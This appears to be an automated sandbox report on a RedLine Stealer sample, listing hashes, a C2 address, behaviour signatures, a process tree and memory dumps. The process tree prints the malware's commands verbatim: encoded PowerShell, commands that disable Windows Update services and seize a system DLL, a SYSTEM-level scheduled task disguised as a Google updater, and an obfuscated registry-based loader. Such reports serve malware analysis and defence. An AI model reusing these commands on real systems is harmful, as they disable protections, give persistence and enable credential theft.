Analysis

  • max time kernel
    162s
  • max time network
    166s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    27-08-2022 20:18

General

  • Target

    tmp.exe

  • Size

    3.0MB

  • MD5

    0730caf5a88ec99420f192f98bfa07d8

  • SHA1

    5830ffc1e922e8a3cd64c5d6593ae2ef33da25a1

  • SHA256

    049726de878da8b7385b3f2a6223902e302ec9fac95d46ab5268bfe1aed094ca

  • SHA512

    bcb82242dd7a8759d247eb3252c60f73f781e4156d77fa2990e43bdbe58af9b7deb2921ea17348dbb60b5940a1a903d34799cc9c622596f0a70d4add2a466e94

  • SSDEEP

    49152:qqZH7ZkIFkIpoCkZVyEwuiRnQ/GRZ9j9EpOExENF/0S4fydRtlyZK4V5UVaVylO:nvk29miaY2pOXMS4fErymKUO

Malware Config

Extracted

Family

redline

C2

185.200.191.18:80

Attributes
  • auth_value

    a11ae941038a2a4398d552996dbd03f1

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 3 TTPs
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry key 1 TTPs 9 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:476
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:460
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k NetworkService
          2⤵
            PID:292
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k DcomLaunch
            2⤵
              PID:592
              • C:\Windows\system32\wbem\wmiprvse.exe
                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                3⤵
                  PID:1416
            • C:\Windows\system32\winlogon.exe
              winlogon.exe
              1⤵
                PID:416
                • C:\Windows\SysWOW64\dllhost.exe
                  C:\Windows\SysWOW64\dllhost.exe /Processid:{18fbb428-ed97-45f1-b87b-eeaa4ed7a1ea}
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:184868
                • C:\Windows\System32\dllhost.exe
                  C:\Windows\System32\dllhost.exe /Processid:{ab195996-c2ea-4ad6-bb6c-a08a17a144d0}
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:184908
              • C:\Users\Admin\AppData\Local\Temp\tmp.exe
                "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
                1⤵
                • Suspicious use of SetThreadContext
                • Drops file in Program Files directory
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1896
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAaABnAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZABkAHkAIwA+AA=="
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1348
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:268
                  • C:\Windows\system32\sc.exe
                    sc stop UsoSvc
                    3⤵
                    • Launches sc.exe
                    PID:1916
                  • C:\Windows\system32\sc.exe
                    sc stop WaaSMedicSvc
                    3⤵
                    • Launches sc.exe
                    PID:764
                  • C:\Windows\system32\sc.exe
                    sc stop wuauserv
                    3⤵
                    • Launches sc.exe
                    PID:1824
                  • C:\Windows\system32\sc.exe
                    sc stop bits
                    3⤵
                    • Launches sc.exe
                    PID:960
                  • C:\Windows\system32\sc.exe
                    sc stop dosvc
                    3⤵
                    • Launches sc.exe
                    PID:1908
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                    3⤵
                    • Modifies registry key
                    PID:388
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                    3⤵
                    • Modifies registry key
                    PID:1652
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                    3⤵
                    • Modifies security service
                    • Modifies registry key
                    PID:1176
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                    3⤵
                    • Modifies registry key
                    PID:1104
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                    3⤵
                    • Modifies registry key
                    PID:2008
                  • C:\Windows\system32\takeown.exe
                    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                    3⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1496
                  • C:\Windows\system32\icacls.exe
                    icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                    3⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:1492
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                    3⤵
                    • Modifies registry key
                    PID:1928
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                    3⤵
                    • Modifies registry key
                    PID:1404
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                    3⤵
                    • Modifies registry key
                    PID:1444
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                    3⤵
                    • Modifies registry key
                    PID:1844
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                    3⤵
                      PID:1700
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                      3⤵
                        PID:316
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                        3⤵
                          PID:1608
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                          3⤵
                            PID:1712
                          • C:\Windows\system32\schtasks.exe
                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                            3⤵
                              PID:1372
                            • C:\Windows\system32\schtasks.exe
                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                              3⤵
                                PID:1332
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                3⤵
                                  PID:924
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1436
                                • C:\Windows\system32\powercfg.exe
                                  powercfg /x -hibernate-timeout-ac 0
                                  3⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1556
                                • C:\Windows\system32\powercfg.exe
                                  powercfg /x -hibernate-timeout-dc 0
                                  3⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1736
                                • C:\Windows\system32\powercfg.exe
                                  powercfg /x -standby-timeout-ac 0
                                  3⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:828
                                • C:\Windows\system32\powercfg.exe
                                  powercfg /x -standby-timeout-dc 0
                                  3⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1184
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAbAAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AHQAZQBtAHAAIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB0AGUAbQBwAC4AZQB4AGUAJwApACAAPAAjAHEAaQBpACMAPgA="
                                2⤵
                                • Drops file in System32 directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:956
                                • C:\Users\Admin\AppData\Local\Temp\temp.exe
                                  "C:\Users\Admin\AppData\Local\Temp\temp.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Modifies system certificate store
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1816
                                  • C:\Users\Admin\AppData\Local\Temp\cmd.exe
                                    "C:\Users\Admin\AppData\Local\Temp\cmd.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:1564
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                      5⤵
                                      • Loads dropped DLL
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:184688
                                      • C:\Users\Admin\AppData\Local\Temp\Starter.exe
                                        "C:\Users\Admin\AppData\Local\Temp\Starter.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:184776
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 183036
                                      5⤵
                                      • Loads dropped DLL
                                      • Program crash
                                      PID:184760
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 5 & Del "temp.exe"
                                    4⤵
                                      PID:184716
                                      • C:\Windows\system32\choice.exe
                                        choice /C Y /N /D Y /T 5
                                        5⤵
                                          PID:184800
                                  • C:\Windows\System32\conhost.exe
                                    C:\Windows\System32\conhost.exe
                                    2⤵
                                    • Drops file in Windows directory
                                    PID:1768
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
                                    2⤵
                                      PID:288
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
                                        3⤵
                                        • Creates scheduled task(s)
                                        PID:1364
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                      2⤵
                                        PID:1608
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                          3⤵
                                            PID:1372
                                      • C:\Windows\system32\lsm.exe
                                        C:\Windows\system32\lsm.exe
                                        1⤵
                                          PID:484
                                        • C:\Windows\system32\taskeng.exe
                                          taskeng.exe {A26A112D-A166-4400-81F2-091C4D43CE2F} S-1-5-18:NT AUTHORITY\System:Service:
                                          1⤵
                                            PID:544
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                              2⤵
                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                              • Drops file in System32 directory
                                              • Suspicious use of SetThreadContext
                                              • Modifies data under HKEY_USERS
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1512
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                                              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                                              2⤵
                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                              • Drops file in System32 directory
                                              • Suspicious use of SetThreadContext
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1556

                                          Network

                                          MITRE ATT&CK Enterprise v6

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                                            Filesize

                                            60KB

                                            MD5

                                            6c6a24456559f305308cb1fb6c5486b3

                                            SHA1

                                            3273ac27d78572f16c3316732b9756ebc22cb6ed

                                            SHA256

                                            efc3c579bd619ceab040c4b8c1b821b2d82c64fddd9e80a00ec0d7f6577ed973

                                            SHA512

                                            587d4a9175a6aa82cd8bb1c11ca6508f95cd218f76ac322ddbd1bc7146a0e25f8937ee426a6fb0fb0bb045cedb24d8c8a9edfe9f654112f293d8701220f726b4

                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                            Filesize

                                            344B

                                            MD5

                                            7ed54ba63281e7f115078fc965e7d26b

                                            SHA1

                                            dce307332dd62afd375f1ebd13b41bceb370cc1b

                                            SHA256

                                            7d9fa90c6a884034bbec99d4753ad9324ef922d5aa837b068bb4d69e21c76bac

                                            SHA512

                                            9a438a97a8e2cdd0b4b485e2b86cce0bb7f79c578155d5fc2ee2a2e579500039d5d5950d0901e6c8117a6d25a2200d49943a81ae389ddd45caf8a0a06e85f31a

                                          • C:\Users\Admin\AppData\Local\Temp\Starter.exe

                                            Filesize

                                            18KB

                                            MD5

                                            f67f9188455a685c402e44748a9f47b1

                                            SHA1

                                            0ed55d3d1227ff4048672ed93df3ad6e096f8031

                                            SHA256

                                            f192fa45cf887a5cdfb904df31238c3201879e8c0a0764f18efad1ce3b6ed713

                                            SHA512

                                            7b8e7faaba35f25ea9fc85845002d5dbeea5380b54a1c65c8462e6f2ea64ac45290926072acaf89a754c3fe8fe5e013bc7e0a08b8c6adce1d5c626e199e6913b

                                          • C:\Users\Admin\AppData\Local\Temp\Starter.exe

                                            Filesize

                                            18KB

                                            MD5

                                            f67f9188455a685c402e44748a9f47b1

                                            SHA1

                                            0ed55d3d1227ff4048672ed93df3ad6e096f8031

                                            SHA256

                                            f192fa45cf887a5cdfb904df31238c3201879e8c0a0764f18efad1ce3b6ed713

                                            SHA512

                                            7b8e7faaba35f25ea9fc85845002d5dbeea5380b54a1c65c8462e6f2ea64ac45290926072acaf89a754c3fe8fe5e013bc7e0a08b8c6adce1d5c626e199e6913b

                                          • C:\Users\Admin\AppData\Local\Temp\cmd.exe

                                            Filesize

                                            351KB

                                            MD5

                                            2c4214d0aa9bfd57e2669e99f8b72af6

                                            SHA1

                                            d84c9cedff9ad408436a7765c5af5cabe1d0a5c9

                                            SHA256

                                            c9376943afab4230e3fc9694e7cd3759f85121abe7891d5dba7ab621f45311c1

                                            SHA512

                                            1baf14ee2c1c31a380610d08430db2e9bfe23bb8e16a26b39e8f38d51caa06149c1eb51e79391bb831804f460ba9df2378972476e73b0715aa0cc5232aa7423d

                                          • C:\Users\Admin\AppData\Local\Temp\temp.exe

                                            Filesize

                                            7KB

                                            MD5

                                            f321da5881a6aaeb53da13d5c075406b

                                            SHA1

                                            979ed66205d2bad63fc016dc8c32cff6a2b6fc05

                                            SHA256

                                            a6bdf9fcd293ff8169731da2a0a9501ad3a4fd14ce1559bc3f3d26dae9e6f57c

                                            SHA512

                                            c7cf54223afcf437d7206e97ce1003ebf5ddc2b8aa986003f53068a4fd873346298bc998abf303bd54a94e83689ac34786e98deb34446862c1c344121d46851b

                                          • C:\Users\Admin\AppData\Local\Temp\temp.exe

                                            Filesize

                                            7KB

                                            MD5

                                            f321da5881a6aaeb53da13d5c075406b

                                            SHA1

                                            979ed66205d2bad63fc016dc8c32cff6a2b6fc05

                                            SHA256

                                            a6bdf9fcd293ff8169731da2a0a9501ad3a4fd14ce1559bc3f3d26dae9e6f57c

                                            SHA512

                                            c7cf54223afcf437d7206e97ce1003ebf5ddc2b8aa986003f53068a4fd873346298bc998abf303bd54a94e83689ac34786e98deb34446862c1c344121d46851b

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                            Filesize

                                            7KB

                                            MD5

                                            a15da32c20b74db6c2d90cb0ddbbf7bb

                                            SHA1

                                            a605a63ce5c51b796f77f0fd7aacf12c93f50bff

                                            SHA256

                                            3a473abf0fc3a0d3a984527577e5c05f7c4d738ad772664afe44840c38e2cde9

                                            SHA512

                                            180c6ebe52b18caf90e9211a6a7ca43ecd511027941a9c0fce181e0a6d9fabb5e27adffd9ebe7d898e126b0fb9acc312ecb6f14bc625c2415daabbb3bf642037

                                          • \??\PIPE\srvsvc

                                            MD5

                                            d41d8cd98f00b204e9800998ecf8427e

                                            SHA1

                                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                                            SHA256

                                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                            SHA512

                                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                          • \??\PIPE\srvsvc

                                            MD5

                                            d41d8cd98f00b204e9800998ecf8427e

                                            SHA1

                                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                                            SHA256

                                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                            SHA512

                                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                          • \Users\Admin\AppData\Local\Temp\Starter.exe

                                            Filesize

                                            18KB

                                            MD5

                                            f67f9188455a685c402e44748a9f47b1

                                            SHA1

                                            0ed55d3d1227ff4048672ed93df3ad6e096f8031

                                            SHA256

                                            f192fa45cf887a5cdfb904df31238c3201879e8c0a0764f18efad1ce3b6ed713

                                            SHA512

                                            7b8e7faaba35f25ea9fc85845002d5dbeea5380b54a1c65c8462e6f2ea64ac45290926072acaf89a754c3fe8fe5e013bc7e0a08b8c6adce1d5c626e199e6913b

                                          • \Users\Admin\AppData\Local\Temp\cmd.exe

                                            Filesize

                                            351KB

                                            MD5

                                            2c4214d0aa9bfd57e2669e99f8b72af6

                                            SHA1

                                            d84c9cedff9ad408436a7765c5af5cabe1d0a5c9

                                            SHA256

                                            c9376943afab4230e3fc9694e7cd3759f85121abe7891d5dba7ab621f45311c1

                                            SHA512

                                            1baf14ee2c1c31a380610d08430db2e9bfe23bb8e16a26b39e8f38d51caa06149c1eb51e79391bb831804f460ba9df2378972476e73b0715aa0cc5232aa7423d

                                          • \Users\Admin\AppData\Local\Temp\cmd.exe

                                            Filesize

                                            351KB

                                            MD5

                                            2c4214d0aa9bfd57e2669e99f8b72af6

                                            SHA1

                                            d84c9cedff9ad408436a7765c5af5cabe1d0a5c9

                                            SHA256

                                            c9376943afab4230e3fc9694e7cd3759f85121abe7891d5dba7ab621f45311c1

                                            SHA512

                                            1baf14ee2c1c31a380610d08430db2e9bfe23bb8e16a26b39e8f38d51caa06149c1eb51e79391bb831804f460ba9df2378972476e73b0715aa0cc5232aa7423d

                                          • \Users\Admin\AppData\Local\Temp\cmd.exe

                                            Filesize

                                            351KB

                                            MD5

                                            2c4214d0aa9bfd57e2669e99f8b72af6

                                            SHA1

                                            d84c9cedff9ad408436a7765c5af5cabe1d0a5c9

                                            SHA256

                                            c9376943afab4230e3fc9694e7cd3759f85121abe7891d5dba7ab621f45311c1

                                            SHA512

                                            1baf14ee2c1c31a380610d08430db2e9bfe23bb8e16a26b39e8f38d51caa06149c1eb51e79391bb831804f460ba9df2378972476e73b0715aa0cc5232aa7423d

                                          • memory/268-65-0x0000000000000000-mapping.dmp

                                          • memory/288-125-0x0000000000000000-mapping.dmp

                                          • memory/316-88-0x0000000000000000-mapping.dmp

                                          • memory/388-74-0x0000000000000000-mapping.dmp

                                          • memory/416-222-0x0000000000360000-0x000000000038A000-memory.dmp

                                            Filesize

                                            168KB

                                          • memory/416-193-0x0000000000330000-0x0000000000353000-memory.dmp

                                            Filesize

                                            140KB

                                          • memory/416-217-0x0000000000330000-0x0000000000353000-memory.dmp

                                            Filesize

                                            140KB

                                          • memory/416-200-0x000007FEBDE90000-0x000007FEBDEA0000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/416-231-0x00000000379B0000-0x00000000379C0000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/460-227-0x00000000379B0000-0x00000000379C0000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/460-223-0x0000000000140000-0x000000000016A000-memory.dmp

                                            Filesize

                                            168KB

                                          • memory/476-228-0x0000000000160000-0x000000000018A000-memory.dmp

                                            Filesize

                                            168KB

                                          • memory/476-232-0x00000000379B0000-0x00000000379C0000-memory.dmp

                                            Filesize

                                            64KB

                                          • memory/484-229-0x0000000000400000-0x000000000042A000-memory.dmp

                                            Filesize

                                            168KB

                                          • memory/592-230-0x00000000005A0000-0x00000000005CA000-memory.dmp

                                            Filesize

                                            168KB

                                          • memory/764-69-0x0000000000000000-mapping.dmp

                                          • memory/828-75-0x0000000000000000-mapping.dmp

                                          • memory/924-93-0x0000000000000000-mapping.dmp

                                          • memory/956-144-0x00000000027DB000-0x00000000027FA000-memory.dmp

                                            Filesize

                                            124KB

                                          • memory/956-101-0x000007FEEDDB0000-0x000007FEEE7D3000-memory.dmp

                                            Filesize

                                            10.1MB

                                          • memory/956-116-0x000000001B700000-0x000000001B9FF000-memory.dmp

                                            Filesize

                                            3.0MB

                                          • memory/956-124-0x00000000027DB000-0x00000000027FA000-memory.dmp

                                            Filesize

                                            124KB

                                          • memory/956-104-0x000007FEED250000-0x000007FEEDDAD000-memory.dmp

                                            Filesize

                                            11.4MB

                                          • memory/956-122-0x00000000027D4000-0x00000000027D7000-memory.dmp

                                            Filesize

                                            12KB

                                          • memory/956-94-0x0000000000000000-mapping.dmp

                                          • memory/960-71-0x0000000000000000-mapping.dmp

                                          • memory/1104-79-0x0000000000000000-mapping.dmp

                                          • memory/1176-77-0x0000000000000000-mapping.dmp

                                          • memory/1184-78-0x0000000000000000-mapping.dmp

                                          • memory/1332-92-0x0000000000000000-mapping.dmp

                                          • memory/1348-63-0x0000000002674000-0x0000000002677000-memory.dmp

                                            Filesize

                                            12KB

                                          • memory/1348-60-0x000007FEEDBF0000-0x000007FEEE74D000-memory.dmp

                                            Filesize

                                            11.4MB

                                          • memory/1348-57-0x0000000000000000-mapping.dmp

                                          • memory/1348-59-0x000007FEEE750000-0x000007FEEF173000-memory.dmp

                                            Filesize

                                            10.1MB

                                          • memory/1348-64-0x000000000267B000-0x000000000269A000-memory.dmp

                                            Filesize

                                            124KB

                                          • memory/1348-61-0x000000001B810000-0x000000001BB0F000-memory.dmp

                                            Filesize

                                            3.0MB

                                          • memory/1348-62-0x0000000002674000-0x0000000002677000-memory.dmp

                                            Filesize

                                            12KB

                                          • memory/1364-126-0x0000000000000000-mapping.dmp

                                          • memory/1372-128-0x0000000000000000-mapping.dmp

                                          • memory/1372-91-0x0000000000000000-mapping.dmp

                                          • memory/1404-84-0x0000000000000000-mapping.dmp

                                          • memory/1436-66-0x0000000000000000-mapping.dmp

                                          • memory/1444-85-0x0000000000000000-mapping.dmp

                                          • memory/1492-82-0x0000000000000000-mapping.dmp

                                          • memory/1496-81-0x0000000000000000-mapping.dmp

                                          • memory/1512-181-0x0000000077970000-0x0000000077B19000-memory.dmp

                                            Filesize

                                            1.7MB

